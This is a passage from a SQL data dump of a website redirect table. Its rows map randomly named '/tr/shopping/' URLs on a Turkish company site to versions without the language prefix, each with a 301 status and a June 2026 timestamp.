00:00:00',301),(73710,'https://3s-technologies.com.tr/tr/shopping/percoidea/3861160478.html',NULL,'https://3s-technologies.com.tr/shopping/percoidea/3861160478.html','',1,0,'2026-06-11 05:57:54','0000-00-00 00:00:00',301),(73711,'https://3s-technologies.com.tr/tr/shopping/textualist/707397722.html',NULL,'https://3s-technologies.com.tr/shopping/textualist/707397722.html','',1,0,'2026-06-11 05:58:01','0000-00-00 00:00:00',301),(73712,'https://3s-technologies.com.tr/tr/shopping/ethyl/1715562069.html',NULL,'https://3s-technologies.com.tr/shopping/ethyl/1715562069.html','',1,0,'2026-06-11 05:58:05','0000-00-00 00:00:00',301),(73713,'https://3s-technologies.com.tr/tr/shopping/notion/739632971.html',NULL,'https://3s-technologies.com.tr/shopping/notion/739632971.html','',1,0,'2026-06-11 05:58:08','0000-00-00 00:00:00',301),(73714,'https://3s-technologies.com.tr/tr/shopping/placodermata/3414659443.html',NULL,'https://3s-technologies.com.tr/shopping/placodermata/3414659443.html','',1,0,'2026-06-11 05:58:11','0000-00-00 00:00:00',301),(73715,'https://3s-technologies.com.tr/tr/shopping/gildale/876834423.html',NULL,'https://3s-technologies.com.tr/shopping/gildale/876834423.html','',1,0,'2026-06-11 05:58:14','0000-00-00 00:00:00',301),(73716,'https://3s-technologies.com.tr/tr/shopping/lamentation/270842768.html',NULL,'https://3s-technologies.com.tr/shopping/lamentation/270842768.html','',1,0,'2026-06-11 05:58:17','0000-00-00 00:00:00',301),(73717,'https://3s-technologies.com.tr/tr/shopping/vestmented/4002950734.html',NULL,'https://3s-technologies.com.tr/shopping/vestmented/4002950734.html','',1,0,'2026-06-11 05:58:20','0000-00-00 00:00:00',301),(73718,'https://3s-technologies.com.tr/tr/shopping/neddy/1920904896.html',NULL,'https://3s-technologies.com.tr/shopping/neddy/1920904896.html','',1,0,'2026-06-11 05:58:23','0000-00-00 00:00:00',301),(73719,'https://3s-technologies.com.tr/tr/shopping/surveillance/41489809.html',NULL,'https://3s-technologies.com.tr/shopping/surveillance/41489809.html','',1,0,'2026-06-11 05:58:26','0000-00-00 00:00:00',301),(73720,'https://3s-technologies.com.tr/tr/shopping/vibrant/3659202882.html',NULL,'https://3s-technologies.com.tr/shopping/vibrant/3659202882.html','',1,0,'2026-06-11 05:58:29','0000-00-00 00:00:00',301),(73721,'https://3s-technologies.com.tr/tr/shopping/skyhigh/2307723584.html',NULL,'https://3s-technologies.com.tr/shopping/skyhigh/2307723584.html','',1,0,'2026-06-11 05:58:32','0000-00-00 00:00:00',301),(73722,'https://3s-technologies.com.tr/tr/shopping/feverishly/1239806487.html',NULL,'https://3s-technologies.com.tr/shopping/feverishly/1239806487.html','',1,0,'2026-06-11 05:58:35','0000-00-00 00:00:00',301),(73723,'https://3s-technologies.com.tr/tr/shopping/acclivities/2176880330.html',NULL,'https://3s-technologies.com.tr/shopping/acclivities/2176880330.html','',1,0,'2026-06-11 05:58:38','0000-00-00 00:00:00',301),(73724,'https://3s-technologies.com.tr/tr/shopping/fakeer/1329464159.html',NULL,'https://3s-technologies.com.tr/shopping/fakeer/1329464159.html','',1,0,'2026-06-11 05:58:41','0000-00-00 00:00:00',301),(73725,'https://3s-technologies.com.tr/tr/shopping/nebuly/1442904736.html',NULL,'https://3s-technologies.com.tr/shopping/nebuly/1442904736.html','',1,0,'2026-06-11 05:58:44','0000-00-00 00:00:00',301),(73726,'https://3s-technologies.com.tr/tr/shopping/enraged/3770386792.html',NULL,'https://3s-technologies.com.tr/shopping/enraged/3770386792.html','',1,0,'2026-06-11 05:58:47','0000-00-00 00:00:00',301),(73727,'https://3s-technologies.com.tr/tr/shopping/rediscover/362057849.html',NULL,'https://3s-technologies.com.tr/shopping/rediscover/362057849.html','',1,0,'2026-06-11 05:58:50','0000-00-00 00:00:00',301),(73728,'https://3s-technologies.com.tr/tr/shopping/pangolin/3114632801.html',NULL,'https://3s-technologies.com.tr/shopping/pangolin/3114632801.html','',1,0,'2026-06-11 05:58:53','0000-00-00 00:00:00',301),(73729,'https://3s-technologies.com.tr/tr/shopping/insider/432757618.html',NULL,'https://3s-technologies.com.tr/shopping/insider/432757618.html','',1,0,'2026-06-11 05:58:56','0000-00-00 00:00:00',301),(73730,'https://3s-technologies.com.tr/tr/shopping/rovingness/2937198242.html',NULL,'https://3s-technologies.com.tr/shopping/rovingness/2937198242.html','',1,0,'2026-06-11 05:58:59','0000-00-00 00:00:00',301),(73731,'https://3s-technologies.com.tr/tr/shopping/honeyware/72512943.html',NULL,'https://3s-technologies.com.tr/shopping/honeyware/72512943.html','',1,0,'2026-06-11 05:59:02','0000-00-00 00:00:00',301),(73732,'https://3s-technologies.com.tr/tr/shopping/sidewinder/4075026109.html',NULL,'https://3s-technologies.com.tr/shopping/sidewinder/4075026109.html','',1,0,'2026-06-11 05:59:05','0000-00-00 00:00:00',301),(73733,'https://3s-technologies.com.tr/tr/shopping/mahone/3075448286.html',NULL,'https://3s-technologies.com.tr/shopping/mahone/3075448286.html','',1,0,'2026-06-11 05:59:08','0000-00-00 00:00:00',301),(73734,'https://3s-technologies.com.tr/tr/shopping/ibexes/2647022316.html',NULL,'https://3s-technologies.com.tr/shopping/ibexes/2647022316.html','',1,0,'2026-06-11 05:59:11','0000-00-00 00:00:00',301),(73735,'https://3s-technologies.com.tr/tr/shopping/righthanded/3639683222.html',NULL,'https://3s-technologies.com.tr/shopping/righthanded/3639683222.html','',1,0,'2026-06-11 05:59:14','0000-00-00 00:00:00',301),(73736,'https://3s-technologies.com.tr/tr/shopping/interseminate/2817956762.html',NULL,'https://3s-technologies.com.tr/shopping/interseminate/2817956762.html','',1,0,'2026-06-11 05:59:17','0000-00-00 00:00:00',301),(73737,'https://3s-technologies.com.tr/tr/shopping/innuit/1831474451.html',NULL,'https://3s-technologies.com.tr/shopping/innuit/1831474451.html','',1,0,'2026-06-11 05:59:20','0000-00-00 00:00:00',301),(73738,'https://3s-technologies.com.tr/tr/shopping/chipmonk/1399115320.html',NULL,'https://3s-technologies.com.tr/shopping/chipmonk/1399115320.html','',1,0,'2026-06-11 05:59:23','0000-00-00 00:00:00',301),(73739,'https://3s-technologies.com.tr/tr/shopping/transfund/3041345327.html',NULL,'https://3s-technologies.com.tr/shopping/transfund/3041345327.html','',1,0,'2026-06-11 05:59:26','0000-00-00 00:00:00',301),(73740,'https://3s-technologies.com.tr/tr/shopping/sabdariffa/3104079587.html',NULL,'https://3s-technologies.com.tr/shopping/sabdariffa/3104079587.html','',1,0,'2026-06-11 05:59:31','0000-00-00 00:00:00',301),(73741,'https://3s-technologies.com.tr/tr/shopping/unroof/2897226958.html',NULL,'https://3s-technologies.com.tr/shopping/unroof/2897226958.html','',1,0,'2026-06-11 05:59:33','0000-00-00 00:00:00',301),(73742,'https://3s-technologies.com.tr/tr/shopping/inconsideracy/958087390.html',NULL,'https://3s-technologies.com.tr/shopping/inconsideracy/958087390.html','',1,0,'2026-06-11 05:59:36','0000-00-00 00:00:00',301),(73743,'https://3s-technologies.com.tr/tr/shopping/reabsorb/662623450.html',NULL,'https://3s-technologies.com.tr/shopping/reabsorb/662623450.html','',1,0,'2026-06-11 05:59:42','0000-00-00 00:00:00',301),(73744,'https://3s-technologies.com.tr/tr/shopping/pruriently/3931860215.html',NULL,'https://3s-technologies.com.tr/shopping/pruriently/3931860215.html','',1,0,'2026-06-11 05:59:46','0000-00-00 00:00:00',301),(73745,'https://3s-technologies.com.tr/tr/shopping/ciphered/2779101492.html',NULL,'https://3s-technologies.com.tr/shopping/ciphered/2779101492.html','',1,0,'2026-06-11 05:59:49','0000-00-00 00:00:00',301),(73746,'https://3s-technologies.com.tr/tr/shopping/nomadism/2117037734.html',NULL,'https://3s-technologies.com.tr/shopping/nomadism/2117037734.html','',1,0,'2026-06-11 05:59:52','0000-00-00 00:00:00',301),(73747,'https://3s-technologies.com.tr/tr/shopping/uretic/4249051598.html',NULL,'https://3s-technologies.com.tr/shopping/uretic/4249051598.html','',1,0,'2026-06-11 05:59:55','0000-00-00 00:00:00',301),(73748,'https://3s-technologies.com.tr/tr/shopping/arctoidea/1179285295.html',NULL,'https://3s-technologies.com.tr/shopping/arctoidea/1179285295.html','',1,0,'2026-06-11 05:59:58','0000-00-00 00:00:00',301),(73749,'https://3s-technologies.com.tr/tr/shopping/lendes/1901125644.html',NULL,'https://3s-technologies.com.tr/shopping/lendes/1901125644.html','',1,0,'2026-06-11 06:00:01','0000-00-00 00:00:00',301),(73750,'https://3s-technologies.com.tr/tr/shopping/seraphina/3491765033.html',NULL,'https://3s-technologies.com.tr/shopping/seraphina/3491765033.html','',1,0,'2026-06-11 06:00:04','0000-00-00 00:00:00',301),(73751,'https://3s-technologies.com.tr/tr/shopping/submetallic/456240605.html',NULL,'https://3s-technologies.com.tr/shopping/submetallic/456240605.html','',1,0,'2026-06-11 06:00:09','0000-00-00 00:00:00',301),(73752,'https://3s-technologies.com.tr/tr/shopping/admittable/1597672372.html',NULL,'https://3s-technologies.com.tr/shopping/admittable/1597672372.html','',1,0,'2026-06-11 06:00:10','0000-00-00 00:00:00',301),(73753,'https://3s-technologies.com.tr/tr/shopping/vulpes/902923427.html',NULL,'https://3s-technologies.com.tr/shopping/vulpes/902923427.html','',1,0,'2026-06-11 06:00:13','0000-00-00 00:00:00',301),(73754,'https://3s-technologies.com.tr/tr/shopping/defile/3866961349.html',NULL,'https://3s-technologies.com.tr/shopping/defile/3866961349.html','',1,0,'2026-06-11 06:00:16','0000-00-00 00:00:00',301),(73755,'https://3s-technologies.com.tr/tr/shopping/gravy/3986644256.html',NULL,'https://3s-technologies.com.tr/shopping/gravy/3986644256.html','',1,0,'2026-06-11 06:00:19','0000-00-00 00:00:00',301),(73756,'https://3s-technologies.com.tr/tr/shopping/capriole/4114274312.html',NULL,'https://3s-technologies.com.tr/shopping/capriole/4114274312.html','',1,0,'2026-06-11 06:00:22','0000-00-00 00:00:00',301),(73757,'https://3s-technologies.com.tr/tr/shopping/antalkali/3684079787.html',NULL,'https://3s-technologies.com.tr/shopping/antalkali/3684079787.html','',1,0,'2026-06-11 06:00:25','0000-00-00 00:00:00',301),(73758,'https://3s-technologies.com.tr/tr/shopping/forslack/1792226232.html',NULL,'https://3s-technologies.com.tr/shopping/forslack/1792226232.html','',1,0,'2026-06-11 06:00:28','0000-00-00 00:00:00',301),(73759,'https://3s-technologies.com.tr/tr/shopping/kennel/486147725.html',NULL,'https://3s-technologies.com.tr/shopping/kennel/486147725.html','',1,0,'2026-06-11 06:00:34','0000-00-00 00:00:00',301),(73760,'https://3s-technologies.com.tr/tr/shopping/psychopomp/3042557426.html',NULL,'https://3s-technologies.com.tr/shopping/psychopomp/3042557426.html','',1,0,'2026-06-11 06:00:36','0000-00-00 00:00:00',301),(73761,'https://3s-technologies.com.tr/tr/shopping/maritimum/1673937275.html',NULL,'https://3s-technologies.com.tr/shopping/maritimum/1673937275.html','',1,0,'2026-06-11 06:00:39','0000-00-00 00:00:00',301),(73762,'https://3s-technologies.com.tr/tr/shopping/maskalonge/704973524.html',NULL,'https://3s-technologies.com.tr/shopping/maskalonge/704973524.html','',1,0,'2026-06-11 06:00:42','0000-00-00 00:00:00',301),(73763,'https://3s-technologies.com.tr/tr/shopping/mildest/1755795160.html',NULL,'https://3s-technologies.com.tr/shopping/mildest/1755795160.html','',1,0,'2026-06-11 06:00:45','0000-00-00 00:00:00',301),(73764,'https://3s-technologies.com.tr/tr/shopping/jestful/78313814.html',NULL,'https://3s-technologies.com.tr/shopping/jestful/78313814.html','',1,0,'2026-06-11 06:00:48','0000-00-00 00:00:00',301),(73765,'https://3s-technologies.com.tr/tr/shopping/reformatory/265876257.html',NULL,'https://3s-technologies.com.tr/shopping/reformatory/265876257.html','',1,0,'2026-06-11 06:00:51','0000-00-00 00:00:00',301),(73766,'https://3s-technologies.com.tr/tr/shopping/disembarrassment/3915717276.html',NULL,'https://3s-technologies.com.tr/shopping/disembarrassment/3915717276.html','',1,0,'2026-06-11 06:00:54','0000-00-00 00:00:00',301),(73767,'https://3s-technologies.com.tr/tr/shopping/laccolite/542124495.html',NULL,'https://3s-technologies.com.tr/shopping/laccolite/542124495.html','',1,0,'2026-06-11 06:00:57','0000-00-00 00:00:00',301),(73768,'https://3s-technologies.com.tr/tr/shopping/razorbacked/2789443560.html',NULL,'https://3s-technologies.com.tr/shopping/razorbacked/2789443560.html','',1,0,'2026-06-11 06:01:00','0000-00-00 00:00:00',301),(73769,'https://3s-technologies.com.tr/tr/shopping/unconformableness/3955525037.html',NULL,'https://3s-technologies.com.tr/shopping/unconformableness/3955525037.html','',1,0,'2026-06-11 06:01:03','0000-00-00 00:00:00',301),(73770,'https://3s-technologies.com.tr/tr/shopping/decembrist/609838293.html',NULL,'https://3s-technologies.com.tr/shopping/decembrist/609838293.html','',1,0,'2026-06-11 06:01:06','0000-00-00 00:00:00',301),(73771,'https://3s-technologies.com.tr/tr/shopping/ogeechee/482511412.html',NULL,'https://3s-technologies.com.tr/shopping/ogeechee/482511412.html','',1,0,'2026-06-11 06:01:09','0000-00-00 00:00:00',301),(73772,'https://3s-technologies.com.tr/tr/shopping/indeciduate/2517998310.html',NULL,'https://3s-technologies.com.tr/shopping/indeciduate/2517998310.html','',1,0,'2026-06-11 06:01:12','0000-00-00 00:00:00',301),(73773,'https://3s-technologies.com.tr/tr/shopping/xiphisternal/1158390029.html',NULL,'https://3s-technologies.com.tr/shopping/xiphisternal/1158390029.html','',1,0,'2026-06-11 06:01:15','0000-00-00 00:00:00',301),(73774,'https://3s-technologies.com.tr/tr/shopping/emulous/2938410325.html',NULL,'https://3s-technologies.com.tr/shopping/emulous/2938410325.html','',1,0,'2026-06-11 06:01:18','0000-00-00 00:00:00',301),(73775,'https://3s-technologies.com.tr/tr/shopping/degage/2592238275.html',NULL,'https://3s-technologies.com.tr/shopping/degage/2592238275.html','',1,0,'2026-06-11 06:01:21','0000-00-00 00:00:00',301),(73776,'https://3s-technologies.com.tr/tr/shopping/euchlaena/1333004355.html',NULL,'https://3s-technologies.com.tr/shopping/euchlaena/1333004355.html','',1,0,'2026-06-11 06:01:24','0000-00-00 00:00:00',301),(73777,'https://3s-technologies.com.tr/tr/shopping/wallabies/3835512885.html',NULL,'https://3s-technologies.com.tr/shopping/wallabies/3835512885.html','',1,0,'2026-06-11 06:01:27','0000-00-00 00:00:00',301),(73778,'https://3s-technologies.com.tr/tr/shopping/ponghee/3841477311.html',NULL,'https://3s-technologies.com.tr/shopping/ponghee/3841477311.html','',1,0,'2026-06-11 06:01:30','0000-00-00 00:00:00',301),(73779,'https://3s-technologies.com.tr/tr/shopping/servicen/49618793.html',NULL,'https://3s-technologies.com.tr/shopping/servicen/49618793.html','',1,0,'2026-06-11 06:01:33','0000-00-00 00:00:00',301),(73780,'https://3s-technologies.com.tr/tr/shopping/arrestor/1943357587.html',NULL,'https://3s-technologies.com.tr/shopping/arrestor/1943357587.html','',1,0,'2026-06-11 06:01:36','0000-00-00 00:00:00',301),(73781,'https://3s-technologies.com.tr/tr/shopping/styrone/3790674925.html',NULL,'https://3s-technologies.com.tr/shopping/styrone/3790674925.html','',1,0,'2026-06-11 06:01:39','0000-00-00 00:00:00',301),(73782,'https://3s-technologies.com.tr/tr/shopping/anthemion/3679490983.html',NULL,'https://3s-technologies.com.tr/shopping/anthemion/3679490983.html','',1,0,'2026-06-11 06:01:42','0000-00-00 00:00:00',301),(73783,'https://3s-technologies.com.tr/tr/shopping/perityphlitis/2846424572.html',NULL,'https://3s-technologies.com.tr/shopping/perityphlitis/2846424572.html','',1,0,'2026-06-11 06:01:45','0000-00-00 00:00:00',301),(73784,'https://3s-technologies.com.tr/tr/shopping/arabist/2745654176.html',NULL,'https://3s-technologies.com.tr/shopping/arabist/2745654176.html','',1,0,'2026-06-11 06:01:48','0000-00-00 00:00:00',301),(73785,'https://3s-technologies.com.tr/tr/shopping/cumbrous/992353872.html',NULL,'https://3s-technologies.com.tr/shopping/cumbrous/992353872.html','',1,0,'2026-06-11 06:01:51','0000-00-00 00:00:00',301),(73786,'https://3s-technologies.com.tr/tr/shopping/apraxic/882635326.html',NULL,'https://3s-technologies.com.tr/shopping/apraxic/882635326.html','',1,0,'2026-06-11 06:01:54','0000-00-00 00:00:00',301),(73787,'https://3s-technologies.com.tr/tr/shopping/fustic/960511572.html',NULL,'https://3s-technologies.com.tr/shopping/fustic/960511572.html','',1,0,'2026-06-11 06:01:59','0000-00-00 00:00:00',301),(73788,'https://3s-technologies.com.tr/tr/shopping/lunacy/3223720327.html',NULL,'https://3s-technologies.com.tr/shopping/lunacy/3223720327.html','',1,0,'2026-06-11 06:02:01','0000-00-00 00:00:00',301),(73789,'https://3s-technologies.com.tr/tr/shopping/ornitholite/1637506203.html',NULL,'https://3s-technologies.com.tr/shopping/ornitholite/1637506203.html','',1,0,'2026-06-11 06:02:04','0000-00-00 00:00:00',301),(73790,'https://3s-technologies.com.tr/tr/shopping/recolonize/3055323692.html',NULL,'https://3s-technologies.com.tr/shopping/recolonize/3055323692.html','',1,0,'2026-06-11 06:02:07','0000-00-00 00:00:00',301),(73791,'https://3s-technologies.com.tr/tr/shopping/surgeonry/3445942185.html',NULL,'https://3s-technologies.com.tr/shopping/surgeonry/3445942185.html','',1,0,'2026-06-11 06:02:10','0000-00-00 00:00:00',301),(73792,'https://3s-technologies.com.tr/tr/shopping/papaveris/1000482856.html',NULL,'https://3s-technologies.com.tr/shopping/papaveris/1000482856.html','',1,0,'2026-06-11 06:02:13','0000-00-00 00:00:00',301),(73793,'https://3s-technologies.com.tr/tr/shopping/peripneumony/170072356.html',NULL,'https://3s-technologies.com.tr/shopping/peripneumony/170072356.html','',1,0,'2026-06-11 06:02:16','0000-00-00 00:00:00',301),(73794,'https://3s-technologies.com.tr/tr/shopping/cruder/3419248231.html',NULL,'https://3s-technologies.com.tr/shopping/cruder/3419248231.html','',1,0,'2026-06-11 06:02:19','0000-00-00 00:00:00',301),(73795,'https://3s-technologies.com.tr/tr/shopping/babying/2893850269.html',NULL,'https://3s-technologies.com.tr/shopping/babying/2893850269.html','',1,0,'2026-06-11 06:02:22','0000-00-00 00:00:00',301),(73796,'https://3s-technologies.com.tr/tr/shopping/matricaria/3930648116.html',NULL,'https://3s-technologies.com.tr/shopping/matricaria/3930648116.html','',1,0,'2026-06-11 06:02:25','0000-00-00 00:00:00',301),(73797,'https://3s-technologies.com.tr/tr/shopping/midseventies/3113420702.html',NULL,'https://3s-technologies.com.tr/shopping/midseventies/3113420702.html','',1,0,'2026-06-11 06:02:28','0000-00-00 00:00:00',301),(73798,'https://3s-technologies.com.tr/tr/shopping/laudation/3465625352.html',NULL,'https://3s-technologies.com.tr/shopping/laudation/3465625352.html','',1,0,'2026-06-11 06:02:31','0000-00-00 00:00:00',301),(73799,'https://3s-technologies.com.tr/tr/shopping/disenrol/1137823992.html',NULL,'https://3s-technologies.com.tr/shopping/disenrol/1137823992.html','',1,0,'2026-06-11 06:02:34','0000-00-00 00:00:00',301),(73800,'https://3s-technologies.com.tr/tr/shopping/shaik/2634539.html',NULL,'https://3s-technologies.com.tr/shopping/shaik/2634539.html','',1,0,'2026-06-11 06:02:37','0000-00-00 00:00:00',301),(73801,'https://3s-technologies.com.tr/tr/shopping/lintwhite/2790655675.html',NULL,'https://3s-technologies.com.tr/shopping/lintwhite/2790655675.html','',1,0,'2026-06-11 06:02:40','0000-00-00 00:00:00',301),(73802,'https://3s-technologies.com.tr/tr/shopping/domiciled/1304932580.html',NULL,'https://3s-technologies.com.tr/shopping/domiciled/1304932580.html','',1,0,'2026-06-11 06:02:43','0000-00-00 00:00:00',301),(73803,'https://3s-technologies.com.tr/tr/shopping/avesta/3921518147.html',NULL,'https://3s-technologies.com.tr/shopping/avesta/3921518147.html','',1,0,'2026-06-11 06:02:46','0000-00-00 00:00:00',301),(73804,'https://3s-technologies.com.tr/tr/shopping/guesdist/976818066.html',NULL,'https://3s-technologies.com.tr/shopping/guesdist/976818066.html','',1,0,'2026-06-11 06:02:49','0000-00-00 00:00:00',301),(73805,'https://3s-technologies.com.tr/tr/shopping/leptocardia/566048909.html',NULL,'https://3s-technologies.com.tr/shopping/leptocardia/566048909.html','',1,0,'2026-06-11 06:02:52','0000-00-00 00:00:00',301),(73806,'https://3s-technologies.com.tr/tr/shopping/extraterrestrial/1917268583.html',NULL,'https://3s-technologies.com.tr/shopping/extraterrestrial/1917268583.html','',1,0,'2026-06-11 06:02:55','0000-00-00 00:00:00',301),(73807,'https://3s-technologies.com.tr/tr/shopping/nearlegged/654398381.html',NULL,'https://3s-technologies.com.tr/shopping/nearlegged/654398381.html','',1,0,'2026-06-11 06:02:58','0000-00-00 00:00:00',301),(73808,'https://3s-technologies.com.tr/tr/shopping/phantascope/1426598258.html',NULL,'https://3s-technologies.com.tr/shopping/phantascope/1426598258.html','',1,0,'2026-06-11 06:03:01','0000-00-00 00:00:00',301),(73809,'https://3s-technologies.com.tr/tr/shopping/noncontagious/1115371285.html',NULL,'https://3s-technologies.com.tr/shopping/noncontagious/1115371285.html','',1,0,'2026-06-11 06:03:04','0000-00-00 00:00:00',301),(73810,'https://3s-technologies.com.tr/tr/shopping/registership/2347790937.html',NULL,'https://3s-technologies.com.tr/shopping/registership/2347790937.html','',1,0,'2026-06-11 06:03:07','0000-00-00 00:00:00',301),(73811,'https://3s-technologies.com.tr/tr/shopping/goodeniaceae/4233515792.html',NULL,'https://3s-technologies.com.tr/shopping/goodeniaceae/4233515792.html','',1,0,'2026-06-11 06:03:10','0000-00-00 00:00:00',301),(73812,'https://3s-technologies.com.tr/tr/shopping/releaser/3379603993.html',NULL,'https://3s-technologies.com.tr/shopping/releaser/3379603993.html','',1,0,'2026-06-11 06:03:13','0000-00-00 00:00:00',301),(73813,'https://3s-technologies.com.tr/tr/shopping/jobbed/1552852692.html',NULL,'https://3s-technologies.com.tr/shopping/jobbed/1552852692.html','',1,0,'2026-06-11 06:03:16','0000-00-00 00:00:00',301),(73814,'https://3s-technologies.com.tr/tr/shopping/dorman/1686143999.html',NULL,'https://3s-technologies.com.tr/shopping/dorman/1686143999.html','',1,0,'2026-06-11 06:03:19','0000-00-00 00:00:00',301),(73815,'https://3s-technologies.com.tr/tr/shopping/scoriae/1988359102.html',NULL,'https://3s-technologies.com.tr/shopping/scoriae/1988359102.html','',1,0,'2026-06-11 06:03:22','0000-00-00 00:00:00',301),(73816,'https://3s-technologies.com.tr/tr/shopping/esculin/1029177877.html',NULL,'https://3s-technologies.com.tr/shopping/esculin/1029177877.html','',1,0,'2026-06-11 06:03:29','0000-00-00 00:00:00',301),(73817,'https://3s-technologies.com.tr/tr/shopping/dispermous/2720777255.html',NULL,'https://3s-technologies.com.tr/shopping/dispermous/2720777255.html','',1,0,'2026-06-11 06:03:33','0000-00-00 00:00:00',301),(73818,'https://3s-technologies.com.tr/tr/shopping/elettaria/109992591.html',NULL,'https://3s-technologies.com.tr/shopping/elettaria/109992591.html','',1,0,'2026-06-11 06:03:36','0000-00-00 00:00:00',301),(73819,'https://3s-technologies.com.tr/tr/shopping/clinkstone/1519568883.html',NULL,'https://3s-technologies.com.tr/shopping/clinkstone/1519568883.html','',1,0,'2026-06-11 06:03:39','0000-00-00 00:00:00',301),(73820,'https://3s-technologies.com.tr/tr/shopping/saimiri/1671772685.html',NULL,'https://3s-technologies.com.tr/shopping/saimiri/1671772685.html','',1,0,'2026-06-11 06:03:42','0000-00-00 00:00:00',301),(73821,'https://3s-technologies.com.tr/tr/shopping/firebrand/2971466923.html',NULL,'https://3s-technologies.com.tr/shopping/firebrand/2971466923.html','',1,0,'2026-06-11 06:03:45','0000-00-00 00:00:00',301),(73822,'https://3s-technologies.com.tr/tr/shopping/nandinia/3088543781.html',NULL,'https://3s-technologies.com.tr/shopping/nandinia/3088543781.html','',1,0,'2026-06-11 06:03:48','0000-00-00 00:00:00',301),(73823,'https://3s-technologies.com.tr/tr/shopping/tamandu/2201411893.html',NULL,'https://3s-technologies.com.tr/shopping/tamandu/2201411893.html','',1,0,'2026-06-11 06:03:51','0000-00-00 00:00:00',301),(73824,'https://3s-technologies.com.tr/tr/shopping/crankbird/363269964.html',NULL,'https://3s-technologies.com.tr/shopping/crankbird/363269964.html','',1,0,'2026-06-11 06:03:54','0000-00-00 00:00:00',301),(73825,'https://3s-technologies.com.tr/tr/shopping/drabbing/2962125824.html',NULL,'https://3s-technologies.com.tr/shopping/drabbing/2962125824.html','',1,0,'2026-06-11 06:03:57','0000-00-00 00:00:00',301),(73826,'https://3s-technologies.com.tr/tr/shopping/guaiacol/458405195.html',NULL,'https://3s-technologies.com.tr/shopping/guaiacol/458405195.html','',1,0,'2026-06-11 06:04:00','0000-00-00 00:00:00',301),(73827,'https://3s-technologies.com.tr/tr/shopping/parroter/3449318874.html',NULL,'https://3s-technologies.com.tr/shopping/parroter/3449318874.html','',1,0,'2026-06-11 06:04:03','0000-00-00 00:00:00',301),(73828,'https://3s-technologies.com.tr/tr/shopping/bavian/1971100117.html',NULL,'https://3s-technologies.com.tr/shopping/bavian/1971100117.html','',1,0,'2026-06-11 06:04:06','0000-00-00 00:00:00',301),(73829,'https://3s-technologies.com.tr/tr/shopping/impoison/2320489834.html',NULL,'https://3s-technologies.com.tr/shopping/impoison/2320489834.html','',1,0,'2026-06-11 06:04:10','0000-00-00 00:00:00',301),(73830,'https://3s-technologies.com.tr/tr/shopping/brainsickness/1725951760.html',NULL,'https://3s-technologies.com.tr/shopping/brainsickness/1725951760.html','',1,0,'2026-06-11 06:04:12','0000-00-00 00:00:00',301),(73831,'https://3s-technologies.com.tr/tr/shopping/mutagenesis/777276142.html',NULL,'https://3s-technologies.com.tr/shopping/mutagenesis/777276142.html','',1,0,'2026-06-11 06:04:15','0000-00-00 00:00:00',301),(73832,'https://3s-technologies.com.tr/tr/shopping/inobservance/3933072314.html',NULL,'https://3s-technologies.com.tr/shopping/inobservance/3933072314.html','',1,0,'2026-06-11 06:04:18','0000-00-00 00:00:00',301),(73833,'https://3s-technologies.com.tr/tr/shopping/technicology/1555440429.html',NULL,'https://3s-technologies.com.tr/shopping/technicology/1555440429.html','',1,0,'2026-06-11 06:04:21','0000-00-00 00:00:00',301),(73834,'https://3s-technologies.com.tr/tr/shopping/parodies/3537537204.html',NULL,'https://3s-technologies.com.tr/shopping/parodies/3537537204.html','',1,0,'2026-06-11 06:04:24','0000-00-00 00:00:00',301),(73835,'https://3s-technologies.com.tr/tr/shopping/animadverter/2472996827.html',NULL,'https://3s-technologies.com.tr/shopping/animadverter/2472996827.html','',1,0,'2026-06-11 06:04:27','0000-00-00 00:00:00',301),(73836,'https://3s-technologies.com.tr/tr/shopping/disengage/2202364400.html',NULL,'https://3s-technologies.com.tr/shopping/disengage/2202364400.html','',1,0,'2026-06-11 06:04:30','0000-00-00 00:00:00',301),(73837,'https://3s-technologies.com.tr/tr/shopping/hagseed/3390994653.html',NULL,'https://3s-technologies.com.tr/shopping/hagseed/3390994653.html','',1,0,'2026-06-11 06:04:33','0000-00-00 00:00:00',301),(73838,'https://3s-technologies.com.tr/tr/shopping/milord/3887085943.html',NULL,'https://3s-technologies.com.tr/shopping/milord/3887085943.html','',1,0,'2026-06-11 06:04:36','0000-00-00 00:00:00',301),(73839,'https://3s-technologies.com.tr/tr/shopping/deprecatory/3254398119.html',NULL,'https://3s-technologies.com.tr/shopping/deprecatory/3254398119.html','',1,0,'2026-06-11 06:04:39','0000-00-00 00:00:00',301),(73840,'https://3s-technologies.com.tr/tr/shopping/ribbonism/385377329.html',NULL,'https://3s-technologies.com.tr/shopping/ribbonism/385377329.html','',1,0,'2026-06-11 06:04:42','0000-00-00 00:00:00',301),(73841,'https://3s-technologies.com.tr/tr/shopping/carriageway/3679327460.html',NULL,'https://3s-technologies.com.tr/shopping/carriageway/3679327460.html','',1,0,'2026-06-11 06:04:45','0000-00-00 00:00:00',301),(73842,'https://3s-technologies.com.tr/tr/shopping/subderisorious/16958230.html',NULL,'https://3s-technologies.com.tr/shopping/subderisorious/16958230.html','',1,0,'2026-06-11 06:04:48','0000-00-00 00:00:00',301),(73843,'https://3s-technologies.com.tr/tr/shopping/mesovarium/542288018.html',NULL,'https://3s-technologies.com.tr/shopping/mesovarium/542288018.html','',1,0,'2026-06-11 06:04:51','0000-00-00 00:00:00',301),(73844,'https://3s-technologies.com.tr/tr/shopping/triquetrum/3839053097.html',NULL,'https://3s-technologies.com.tr/shopping/triquetrum/3839053097.html','',1,0,'2026-06-11 06:04:54','0000-00-00 00:00:00',301),(73845,'https://3s-technologies.com.tr/tr/shopping/gasconaded/1677573556.html',NULL,'https://3s-technologies.com.tr/shopping/gasconaded/1677573556.html','',1,0,'2026-06-11 06:04:59','0000-00-00 00:00:00',301),(73846,'https://3s-technologies.com.tr/tr/shopping/oxalurate/1614004904.html',NULL,'https://3s-technologies.com.tr/shopping/oxalurate/1614004904.html','',1,0,'2026-06-11 06:05:01','0000-00-00 00:00:00',301),(73847,'https://3s-technologies.com.tr/tr/shopping/hoyman/3251973937.html',NULL,'https://3s-technologies.com.tr/shopping/hoyman/3251973937.html','',1,0,'2026-06-11 06:05:04','0000-00-00 00:00:00',301),(73848,'https://3s-technologies.com.tr/tr/shopping/informant/2638893300.html',NULL,'https://3s-technologies.com.tr/shopping/informant/2638893300.html','',1,0,'2026-06-11 06:05:08','0000-00-00 00:00:00',301),(73849,'https://3s-technologies.com.tr/tr/shopping/ambiparous/2182239806.html',NULL,'https://3s-technologies.com.tr/shopping/ambiparous/2182239806.html','',1,0,'2026-06-11 06:05:10','0000-00-00 00:00:00',301),(73850,'https://3s-technologies.com.tr/tr/shopping/stolid/2721989354.html',NULL,'https://3s-technologies.com.tr/shopping/stolid/2721989354.html','',1,0,'2026-06-11 